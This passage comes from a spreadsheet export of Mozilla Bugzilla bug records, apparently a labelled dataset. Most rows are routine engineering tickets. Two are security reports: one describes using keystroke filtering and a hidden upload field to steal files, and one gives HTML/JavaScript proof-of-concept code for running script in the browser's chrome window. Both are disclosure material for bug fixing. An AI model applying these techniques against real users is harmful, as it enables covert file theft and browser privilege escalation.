      </c>
      <c r="R3201" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3201" t="inlineStr">
        <is>
          <t>mozilla43</t>
        </is>
      </c>
      <c r="T3201" t="n">
        <v>1</v>
      </c>
      <c r="U3201" t="n">
        <v>0</v>
      </c>
      <c r="V3201" t="n">
        <v>20</v>
      </c>
      <c r="W3201" t="inlineStr">
        <is>
          <t>Created attachment 8638147
call_stack.txt
This may be related to Bug 1156517 but the call stacks do differ.</t>
        </is>
      </c>
      <c r="X3201" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3202">
      <c r="A3202" t="n">
        <v>290478</v>
      </c>
      <c r="B3202" t="inlineStr">
        <is>
          <t>2005-04-15 08:50:30 -0700</t>
        </is>
      </c>
      <c r="C3202" t="inlineStr">
        <is>
          <t>malicious webpage can filter keyboard strokes and specify a file for uploading from client</t>
        </is>
      </c>
      <c r="D3202" t="inlineStr">
        <is>
          <t>2006-06-18 14:32:14 -0700</t>
        </is>
      </c>
      <c r="E3202" t="n">
        <v>1</v>
      </c>
      <c r="F3202" t="n">
        <v>1</v>
      </c>
      <c r="G3202" t="n">
        <v>3</v>
      </c>
      <c r="H3202" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3202" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3202" t="inlineStr">
        <is>
          <t>DOM: Events</t>
        </is>
      </c>
      <c r="K3202" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3202" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M3202" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3202" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3202" t="inlineStr">
        <is>
          <t>DUPLICATE</t>
        </is>
      </c>
      <c r="P3202" t="inlineStr"/>
      <c r="Q3202" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3202" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3202" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3202" t="n">
        <v>0</v>
      </c>
      <c r="U3202" t="n">
        <v>0</v>
      </c>
      <c r="V3202" t="n">
        <v>5</v>
      </c>
      <c r="W3202" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.6) Gecko/20050317 Firefox/1.0.2
Build Identifier: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.6) Gecko/20050317 Firefox/1.0.2
In the page at www.lemure.net/~chuck/hiddenForm_moz.html you can see a sample
code that demonstrates this problem.  By filtering out keyboard events in a
specific order, it is possible to for a webpage to specify the file wanted for
upload.  By combining this with CSS, the upload dialog becomes invisible and the
user in unaware of the fact that they are entering a file.
If this is combined with a website related to technical discussion or similar
that has users entering a lot of / \ and : then it becomes somewhat trivial to
upload files.
Reproducible: Always
Steps to Reproduce:
In the problem url specified, enter text into the text box.  If a user types the
correct character, it will be captured and send focus to the file upload dialog.
 This allows a webpage to specifiy a file name, in this example, C:\boot.ini.
Actual Results:  
file upload
Expected Results:  
Prevent shifting focus to/from file upload widget.</t>
        </is>
      </c>
      <c r="X3202" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3203">
      <c r="A3203" t="n">
        <v>1552890</v>
      </c>
      <c r="B3203" t="inlineStr">
        <is>
          <t>2019-05-20 09:17:49 -0700</t>
        </is>
      </c>
      <c r="C3203" t="inlineStr">
        <is>
          <t>socorro deploy: 378</t>
        </is>
      </c>
      <c r="D3203" t="inlineStr">
        <is>
          <t>2019-05-20 12:00:45 -0700</t>
        </is>
      </c>
      <c r="E3203" t="n">
        <v>1</v>
      </c>
      <c r="F3203" t="n">
        <v>1</v>
      </c>
      <c r="G3203" t="n">
        <v>4</v>
      </c>
      <c r="H3203" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I3203" t="inlineStr">
        <is>
          <t>Socorro</t>
        </is>
      </c>
      <c r="J3203" t="inlineStr">
        <is>
          <t>Infra</t>
        </is>
      </c>
      <c r="K3203" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3203" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3203" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3203" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3203" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3203" t="inlineStr"/>
      <c r="Q3203" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R3203" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3203" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3203" t="n">
        <v>1</v>
      </c>
      <c r="U3203" t="n">
        <v>0</v>
      </c>
      <c r="V3203" t="n">
        <v>3</v>
      </c>
      <c r="W3203" t="inlineStr">
        <is>
          <t>We want to do a Socorro -prod deploy today tagged 378.
It consists of the following:
(current tag: 377 - `787b58e`)
`0fac8b6`: bug 1549297: fix android manufacturer faceting (willkg)
`e6e988a`: bug 1543097: Convert webapp to sentry_sdk 0.7.14 (jwhitlock)
`a732dd8`: bug 1543097: Switch mgmt cmd cronrun to sentry_sdk (jwhitlock)
`98e98fa`: bug 1543097: Switch cmd depcheck to sentry_sdk (jwhitlock)
`3bc2d34`: bug 1543097: Convert processor to sentry_sdk (jwhitlock)
`446b9dc`: bug 1543097: Remove sentry_dsn from client args (jwhitlock)
`1162b62`: bug 1543097: Filter webapp events for pii/security (jwhitlock)
`9a369fb`: bug 1543097: Do not send DisallowedHost to Sentry (jwhitlock)
`49c4973`: bug 1543097: Fix IDs for before_send headers test (jwhitlock)
`b7601c5`: bug 1543097: Filter ELB IP headers in Sentry (jwhitlock)
`6416031`: Document deploys and PII request processing (willkg)
`c2caed0`: Fix typos and clarify deploy and processing-requests docs (willkg)
(next tag: 378 - `b649e89`)
Additional things to note:
* The ``sentry_sdk`` is the current framework for reporting to Sentry, and replaces the deprecated ``raven`` framework we are currently using. It includes sending event for log messages logged at the error level, so there will be additional messages for conditions not reported by ``raven``. It ran in stage for three days, with some tuning after the initial deploy.</t>
        </is>
      </c>
      <c r="X3203" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3204">
      <c r="A3204" t="n">
        <v>1364031</v>
      </c>
      <c r="B3204" t="inlineStr">
        <is>
          <t>2017-05-11 04:20:20 -0700</t>
        </is>
      </c>
      <c r="C3204" t="inlineStr">
        <is>
          <t>filters.tests.js 'displayNumber filter' failing with "Expected '∞' to equal 'Infinity'."</t>
        </is>
      </c>
      <c r="D3204" t="inlineStr">
        <is>
          <t>2017-06-20 05:46:14 -0700</t>
        </is>
      </c>
      <c r="E3204" t="n">
        <v>1</v>
      </c>
      <c r="F3204" t="n">
        <v>1</v>
      </c>
      <c r="G3204" t="n">
        <v>7</v>
      </c>
      <c r="H3204" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I3204" t="inlineStr">
        <is>
          <t>Tree Management</t>
        </is>
      </c>
      <c r="J3204" t="inlineStr">
        <is>
          <t>Perfherder</t>
        </is>
      </c>
      <c r="K3204" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="L3204" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3204" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3204" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3204" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3204" t="inlineStr"/>
      <c r="Q3204" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3204" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3204" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3204" t="n">
        <v>1</v>
      </c>
      <c r="U3204" t="n">
        <v>0</v>
      </c>
      <c r="V3204" t="n">
        <v>4</v>
      </c>
      <c r="W3204" t="inlineStr">
        <is>
          <t>"""
Firefox 53.0.0 (Linux 0.0.0) displayNumber filter returns expected values FAILED
	Expected '∞' to equal 'Infinity'.
	@tests/ui/unit/init.js:158122:9
Firefox 53.0.0 (Linux 0.0.0): Executed 31 of 44 (2 FAILED) (0 secs / 0.863 secs)
Firefox 53.0.0 (Linux 0.0.0) displayNumber filter returns expected values FAILED
	Expected '∞' to equal 'Infinity'.
	@tests/ui/unit/init.js:158122:9
"""
https://travis-ci.org/mozilla/treeherder/jobs/230892456#L430
The Travis job is currently green even though the test is failing, due to bug 1364030.
The test broke as part of bug 1361835, since previously `parseFloat(1/0).toFixed(2);` was equal to `"Infinity"`.</t>
        </is>
      </c>
      <c r="X3204" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3205">
      <c r="A3205" t="n">
        <v>824262</v>
      </c>
      <c r="B3205" t="inlineStr">
        <is>
          <t>2012-12-22 07:30:39 -0800</t>
        </is>
      </c>
      <c r="C3205" t="inlineStr">
        <is>
          <t>Querying for strings in comments is now ultra slow</t>
        </is>
      </c>
      <c r="D3205" t="inlineStr">
        <is>
          <t>2013-01-03 05:46:46 -0800</t>
        </is>
      </c>
      <c r="E3205" t="n">
        <v>1</v>
      </c>
      <c r="F3205" t="n">
        <v>1</v>
      </c>
      <c r="G3205" t="n">
        <v>4</v>
      </c>
      <c r="H3205" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I3205" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J3205" t="inlineStr">
        <is>
          <t>Query/Bug List</t>
        </is>
      </c>
      <c r="K3205" t="inlineStr">
        <is>
          <t>4.4</t>
        </is>
      </c>
      <c r="L3205" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3205" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3205" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3205" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3205" t="inlineStr"/>
      <c r="Q3205" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3205" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S3205" t="inlineStr">
        <is>
          <t>Bugzilla 4.4</t>
        </is>
      </c>
      <c r="T3205" t="n">
        <v>1</v>
      </c>
      <c r="U3205" t="n">
        <v>0</v>
      </c>
      <c r="V3205" t="n">
        <v>7</v>
      </c>
      <c r="W3205" t="inlineStr">
        <is>
          <t>This is a regression due to bug 780820. Bugzilla 4.4rc1 is not affected as that bug landed after the release of 4.4rc1.
build_subselect() in Bugzilla/Search.pm now executes subselects itself and returs a hardcoded list of bug IDs instead of returning the subselect itself which will be executed as part of the larger query. This means that the subselect is executed independently of the other criteria used in the main search. For instance, using the GCC Bugzilla DB, looking for bugs assigned to me with "testing" in a comment returns 3 bugs in 0.006 second with the old subselect code, but takes 12.2 seconds with the new code!! The reason is that I have very few bugs assigned to me on GCC Bugzilla, and so the DB optimizer will restrict the search to these few bugs to execute the subselect. Now as the subselect is executed independently, it scans all the bugs and comments, which takes 12 seconds by itself! This is a major regression.
This also means that queries which will return no bugs due to impossible criteria will also take ages to complete instead of letting the DB optimizer skip the subselects immediately because it already knows that the query has no chance to return something.
So we have no other choice than to backout changes made in build_subselect(), at least for comments.</t>
        </is>
      </c>
      <c r="X3205" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3206">
      <c r="A3206" t="n">
        <v>1183618</v>
      </c>
      <c r="B3206" t="inlineStr">
        <is>
          <t>2015-07-14 06:10:49 -0700</t>
        </is>
      </c>
      <c r="C3206" t="inlineStr">
        <is>
          <t>Implement the refreshed design for the contacts list</t>
        </is>
      </c>
      <c r="D3206" t="inlineStr">
        <is>
          <t>2015-09-28 05:56:29 -0700</t>
        </is>
      </c>
      <c r="E3206" t="n">
        <v>1</v>
      </c>
      <c r="F3206" t="n">
        <v>1</v>
      </c>
      <c r="G3206" t="n">
        <v>6</v>
      </c>
      <c r="H3206" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I3206" t="inlineStr">
        <is>
          <t>Hello (Loop)</t>
        </is>
      </c>
      <c r="J3206" t="inlineStr">
        <is>
          <t>Client</t>
        </is>
      </c>
      <c r="K3206" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3206" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3206" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3206" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3206" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3206" t="inlineStr">
        <is>
          <t>[visual refresh]</t>
        </is>
      </c>
      <c r="Q3206" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3206" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3206" t="inlineStr">
        <is>
          <t>mozilla42</t>
        </is>
      </c>
      <c r="T3206" t="n">
        <v>1</v>
      </c>
      <c r="U3206" t="n">
        <v>0</v>
      </c>
      <c r="V3206" t="n">
        <v>59</v>
      </c>
      <c r="W3206" t="inlineStr">
        <is>
          <t>As the acceptance criteria in bug 1179210 states:
 - Contact list visual refresh
Note: this _does_ include the individual contact entries and does _not_ include the presented favorites feature and related design elements.
For the visual design spec, please check out the ones attached to bug 1179210.</t>
        </is>
      </c>
      <c r="X3206" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3207">
      <c r="A3207" t="n">
        <v>1281071</v>
      </c>
      <c r="B3207" t="inlineStr">
        <is>
          <t>2016-06-20 16:02:44 -0700</t>
        </is>
      </c>
      <c r="C3207" t="inlineStr">
        <is>
          <t>Sidebar bookmark can have reference to chrome window</t>
        </is>
      </c>
      <c r="D3207" t="inlineStr">
        <is>
          <t>2024-05-30 09:18:36 -0700</t>
        </is>
      </c>
      <c r="E3207" t="n">
        <v>1</v>
      </c>
      <c r="F3207" t="n">
        <v>1</v>
      </c>
      <c r="G3207" t="n">
        <v>3</v>
      </c>
      <c r="H3207" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3207" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3207" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K3207" t="inlineStr">
        <is>
          <t>50 Branch</t>
        </is>
      </c>
      <c r="L3207" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3207" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3207" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3207" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3207" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main50+] btpp-active</t>
        </is>
      </c>
      <c r="Q3207" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3207" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3207" t="inlineStr">
        <is>
          <t>mozilla50</t>
        </is>
      </c>
      <c r="T3207" t="n">
        <v>1</v>
      </c>
      <c r="U3207" t="n">
        <v>0</v>
      </c>
      <c r="V3207" t="n">
        <v>30</v>
      </c>
      <c r="W3207" t="inlineStr">
        <is>
          <t>User Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36
Steps to reproduce:
----------Sidebar-Source----------------------------------------
&lt;html&gt;
&lt;head&gt;&lt;/head&gt;
&lt;body&gt;
&lt;textarea id="hell"&gt;&lt;/textarea&gt;
&lt;br&gt;
&lt;button id="butt"&gt;go&lt;/button&gt;
&lt;script&gt;
butt.onclick=function(){
	window.location='javascript:'+hell.value+';void(0)';
}
&lt;/script&gt;
&lt;/body&gt;
&lt;/html&gt;
----------------base64-Encoded-------------------------------------data:text/html;base64,PGh0bWw+CjxoZWFkPjwvaGVhZD4KPGJvZHk+Cjx0ZXh0YXJlYSBpZD0iaGVsbCI+PC90ZXh0YXJlYT4KPGJyPgo8YnV0dG9uIGlkPSJidXR0Ij5nbzwvYnV0dG9uPgo8c2NyaXB0PgpidXR0Lm9uY2xpY2s9ZnVuY3Rpb24oKXsKCXdpbmRvdy5sb2NhdGlvbj0namF2YXNjcmlwdDonK2hlbGwudmFsdWUrJzt2b2lkKDApJzsKfQo8L3NjcmlwdD4KPC9ib2R5Pgo8L2h0bWw+
-----------------------------------------------------------------------
1. Open Firefox (tested on nightly and stable) and hit CTRL+SHIFT+B to open bookmark library.
2. Create new bookmark with the location of the base64 encoded data uri above.
3. Make sure to check 'load this bookmark in the sidebar' and add
4. Open a new tab then execute the bookmark, it should open on the side.
5. Open the web console of the new tab (to view the error)
6. Execute the following and observe behavior (by copy pasting it inside the textarea and pressing 'go'):
-  alert(content) =&gt; Error: "Error: Permission denied to access property Symbol.toPrimitive" {file: "javascript:alert(content);void(0)" line: 1}]
@javascript:alert(content);void(0):1:1
- content.close() =&gt; [JavaScript Error: "Error: Permission denied to access property "close"" {file: "javascript:content.close();void(0)" line: 1}]
@javascript:content.close();void(0):1:1
- close.bind(content)() =&gt; [JavaScript Warning: "Scripts may not close windows that were not opened by script." {file: "javascript:close.bind(content)();void(0)" line: 1}]
Note: The above javascript warning was displayed inside the console opened in newtab.
- var q = new mozRTCPeerConnection;q.createOffer(Map,close.bind(content)); =&gt; [JavaScript Warning: "Scripts may not close windows that were not opened by script." {file: "about:newtab" line: 0}]
note: notice the file: that originated the error.
Actual results:
It seems like javascript is executed in the chrome context though so far I can only execute close(), blur() and focus()
Expected results:
Block script execution from content to chrome window. 
The theory is that this could be used in the future to execute code in chrome context using other exploits.</t>
        </is>
      </c>
      <c r="X3207" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3208">
      <c r="A3208" t="n">
        <v>483907</v>
      </c>
      <c r="B3208" t="inlineStr">
        <is>
          <t>2009-03-17 17:17:09 -0700</t>
        </is>
      </c>
      <c r="C3208" t="inlineStr">
        <is>
          <t>Website: Entire persona description is displayed in the gallery</t>
        </is>
      </c>
      <c r="D3208" t="inlineStr">
        <is>
          <t>2016-07-29 13:12:35 -0700</t>
        </is>
      </c>
      <c r="E3208" t="n">
        <v>1</v>
      </c>
      <c r="F3208" t="n">
        <v>1</v>
      </c>
      <c r="G3208" t="n">
        <v>6</v>
      </c>
      <c r="H3208" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I3208" t="inlineStr">
        <is>
          <t>Mozilla Labs Graveyard</t>
        </is>
      </c>
      <c r="J3208" t="inlineStr">
        <is>
          <t>Personas Plus</t>
        </is>
      </c>
      <c r="K3208" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3208" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M3208" t="inlineStr">
        <is>
          <t>Windows XP</t>
        </is>
      </c>
      <c r="N3208" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3208" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3208" t="inlineStr"/>
      <c r="Q3208" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3208" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S3208" t="inlineStr">
        <is>
          <t>1.0</t>
        </is>
      </c>
      <c r="T3208" t="n">
        <v>1</v>
      </c>
      <c r="U3208" t="n">
        <v>0</v>
      </c>
      <c r="V3208" t="n">
        <v>5</v>
      </c>
      <c r="W3208" t="inlineStr">
        <is>
          <t>Created attachment 367924
adding description
Steps to reproduce:
1.Create a persona with a very lengthy description.(I copied a very lengthy article from cnn.com and pasted it)
2.Log into your admin.While approving admin cannot view the attached description of the persona.Approve the persona
3.Go to
 https://sm-weave-proxy01.services.mozilla.com/store/dynamic/gallery/All/Recent
4.Click on the "view details" link for your persona
expected result:
-Only teasers of the actual descriptions are displayed in the gallery OR description is visible only on clicking "view details".
actual result:
-Entire description is displayed in the Gallery.This breaks the UI.(see screenshot)
This will cause problems even for not-so-lengthy descriptions.Assuming each persona description is of a different length,this will affect the formatting/layout of the gallery</t>
        </is>
      </c>
      <c r="X3208" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3209">
      <c r="A3209" t="n">
        <v>702321</v>
      </c>
      <c r="B3209" t="inlineStr">
        <is>
          <t>2011-11-14 09:54:41 -0800</t>
        </is>
      </c>
      <c r="C3209" t="inlineStr">
        <is>
          <t>Backend query for Roboform</t>
        </is>
      </c>
      <c r="D3209" t="inlineStr">
        <is>
          <t>2011-12-28 10:40:11 -0800</t>
        </is>
      </c>
      <c r="E3209" t="n">
        <v>1</v>
      </c>
      <c r="F3209" t="n">
        <v>1</v>
      </c>
      <c r="G3209" t="n">
        <v>4</v>
      </c>
      <c r="H3209" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I3209" t="inlineStr">
        <is>
          <t>Socorro</t>
        </is>
      </c>
      <c r="J3209" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K3209" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3209" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M3209" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N3209" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3209" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3209" t="inlineStr"/>
      <c r="Q3209" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3209" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S3209" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3209" t="n">
        <v>1</v>
      </c>
      <c r="U3209" t="n">
        <v>0</v>
      </c>
      <c r="V3209" t="n">
        <v>6</v>
      </c>
      <c r="W3209" t="inlineStr">
        <is>
          <t>Roboform released a new version - 3.6.3. Bug 699134 is requesting a blocklist. Since the new version has been released I just want to make sure that no users are crashing using that version before we do the blocklist.  The two dlls in question are:
rf-firefox.dll 7.6.3.0
roboform.dll   7.6.3.0
Bug 691271 has the crash signatures that are associated with this crash.
Also is there a way to grep for the most common version of these two dlls that are causing crashes across all Firefox versions?</t>
        </is>
      </c>
      <c r="X3209" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3210">
      <c r="A3210" t="n">
        <v>1414849</v>
      </c>
      <c r="B3210" t="inlineStr">
        <is>
          <t>2017-11-06 07:47:25 -0800</t>
        </is>
      </c>
      <c r="C3210" t="inlineStr">
        <is>
          <t>Assertion failure: loc1 == loc2, at js/src/jit/CacheIRCompiler.cpp:474</t>
        </is>
      </c>
      <c r="D3210" t="inlineStr">
        <is>
          <t>2017-11-29 18:23:18 -0800</t>
        </is>
      </c>
      <c r="E3210" t="n">
        <v>1</v>
      </c>
      <c r="F3210" t="n">
        <v>1</v>
      </c>
      <c r="G3210" t="n">
        <v>3</v>
      </c>
      <c r="H3210" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3210" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3210" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K3210" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3210" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M3210" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N3210" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3210" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3210" t="inlineStr">
        <is>
          <t>[jsbugmon:update,bisect]</t>
        </is>
      </c>
      <c r="Q3210" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3210" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3210" t="inlineStr">
        <is>
          <t>mozilla59</t>
        </is>
      </c>
      <c r="T3210" t="n">
        <v>1</v>
      </c>
      <c r="U3210" t="n">
        <v>0</v>
      </c>
      <c r="V3210" t="n">
        <v>5</v>
      </c>
      <c r="W3210" t="inlineStr">
        <is>
          <t>The following testcase crashes on mozilla-central revision 4e6df5159df3 (build with --enable-posix-nspr-emulation --enable-valgrind --enable-gczeal --disable-tests --enable-stdcxx-compat --disable-profiling --enable-debug --without-intl-api --enable-optimize --target=i686-pc-linux-gnu, run with --fuzzing-safe --cpu-count=2 --ion-eager --ion-offthread-compile=off):
var msPerHour = 3600000;
var TZ_DIFF = getTimeZoneDiff();
var TZ_ADJUST = TZ_DIFF * msPerHour;
var UTC_1_JAN_2005 = TimeInYear(2001) + TimeInYear(2002) + TimeInYear(2003) + TimeInYear(2004);
function getTimeZoneDiff() {}
function TimeInYear(y) {
  addDateTestCase(UTC_1_JAN_2005 - TZ_ADJUST);
  function addDateTestCase(date_given_in_milliseconds)
    givenDate = new Date(date_given_in_milliseconds);
  expect = extractTimeString(givenDate);
  function extractTimeString(date) {
    regexp = new RegExp(date.toDateString() + '(.*)' + '\$');
    hopeThisIsTimeString = date.toString().match(regexp)[1];
    return trimL(trimR(hopeThisIsTimeString));
    function trimL(s) {}
    function trimR(s) {
      for (var i = s; i!=-1; i--)
        if (s[i] != ' ') break;
    }
 }
}
Backtrace:
received signal SIGSEGV, Segmentation fault.
0x0829067e in js::jit::CacheRegisterAllocator::fixupAliasedInputs (this=0xffffb3f0, masm=...) at js/src/jit/CacheIRCompiler.cpp:473
#0  0x0829067e in js::jit::CacheRegisterAllocator::fixupAliasedInputs (this=0xffffb3f0, masm=...) at js/src/jit/CacheIRCompiler.cpp:473
#1  0x0832227f in js::jit::IonCacheIRCompiler::compile (this=0xffffa9a0) at js/src/jit/IonCacheIRCompiler.cpp:556
#2  0x0832e6c3 in js::jit::IonIC::attachCacheIRStub (this=0xf5eca130, cx=0xf791d000, writer=..., kind=&lt;incomplete type&gt;, ionScript=0xf5eca000, attached=0xffffb873, typeCheckInfo=0x0) at js/src/jit/IonCacheIRCompiler.cpp:2428
#3  0x0836ec2d in js::jit::IonGetPropertyIC::update (cx=0xf791d000, outerScript=..., ic=0xf5eca130, val=..., idVal=..., res=...) at js/src/jit/IonIC.cpp:146
#4  0x299a4653 in ?? ()
Backtrace stopped: previous frame inner to this frame (corrupt stack?)
eax	0x0	0
ebx	0xffffb458	-19368
ecx	0xf7da4864	-136689564
edx	0x0	0
esi	0x0	0
edi	0x5	5
ebp	0xffffa848	4294944840
esp	0xffffa810	4294944784
eip	0x829067e &lt;js::jit::CacheRegisterAllocator::fixupAliasedInputs(js::jit::MacroAssembler&amp;)+718&gt;
=&gt; 0x829067e &lt;js::jit::CacheRegisterAllocator::fixupAliasedInputs(js::jit::MacroAssembler&amp;)+718&gt;:	movl   $0x0,0x0
   0x8290688 &lt;js::jit::CacheRegisterAllocator::fixupAliasedInputs(js::jit::MacroAssembler&amp;)+728&gt;:	ud2</t>
        </is>
      </c>
      <c r="X3210" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3211">
      <c r="A3211" t="n">
        <v>1159675</v>
      </c>
      <c r="B3211" t="inlineStr">
        <is>
          <t>2015-04-29 04:03:17 -0700</t>
        </is>
      </c>
      <c r="C3211" t="inlineStr">
        <is>
          <t>[Thunderbird] Romanian: The same shortcut (Ctrl+A) is asigned for "Select all" and "Create new message"</t>
        </is>
      </c>
      <c r="D3211" t="inlineStr">
        <is>
          <t>2015-08-10 14:11:09 -0700</t>
        </is>
      </c>
      <c r="E3211" t="n">
        <v>1</v>
      </c>
      <c r="F3211" t="n">
        <v>1</v>
      </c>
      <c r="G3211" t="n">
        <v>2</v>
      </c>
      <c r="H3211" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I3211" t="inlineStr">
        <is>
          <t>Mozilla Localizations</t>
        </is>
      </c>
      <c r="J3211" t="inlineStr">
        <is>
          <t>ro / Romanian</t>
        </is>
      </c>
      <c r="K3211" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3211" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3211" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3211" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3211" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3211" t="inlineStr">
        <is>
          <t>[ro]</t>
        </is>
      </c>
      <c r="Q3211" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3211" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3211" t="inlineStr">
        <is>
          <t>mozilla40</t>
        </is>
